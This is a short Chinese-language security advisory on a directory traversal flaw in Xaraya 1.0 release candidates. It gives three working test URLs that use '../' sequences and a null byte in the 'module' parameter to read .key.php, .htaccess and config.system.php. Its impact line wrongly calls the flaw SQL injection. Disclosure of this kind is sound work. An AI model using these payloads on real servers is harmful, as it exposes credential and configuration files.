Xaraya远程目录遍历注入漏洞

lishiai

BUGTRAQ ID: 15623
CNCAN ID:CNCAN-2005113022

漏洞消息时间:2005-11-29

漏洞起因
输入验证错误

影响系统
Xaraya Xaraya 1.0 RC4
Xaraya Xaraya 1.0 RC3
Xaraya Xaraya 1.0 RC2
Xaraya Xaraya 1.0 RC1

危害
远程攻击者可以利用漏洞进行SQL注入攻击获得敏感信息。

攻击所需条件
攻击者必须访问Xaraya。

漏洞信息
Xaraya是一款基于WEB的开放源代码WEB应用程序架构。
Xaraya不充分过滤用户提交的URI，远程攻击者可以利用漏洞以WEB权限查看系统文件内容。
问题是index.php脚本对用户提交的'module'参数缺少充分过滤，提交包含多个"../"字符作为WEB参数数据，可绕过WEB ROOT限制，以WEB权限查看系统文件内容。

测试方法
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../.key.php
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../../.htaccess
http://www.example.com/[path_to_xaraya]/index.php?module=../../../../config.system.php%00

厂商解决方案
目前没有解决方案提供,请关注以下链接:
http://www.xaraya.com/

漏洞提供者
rgod <retrogod@aliceposta.it>.

漏洞消息链接
http://www.securityfocus.com/bid/15623

漏洞消息标题
Xaraya Directory Traversal Vulnerability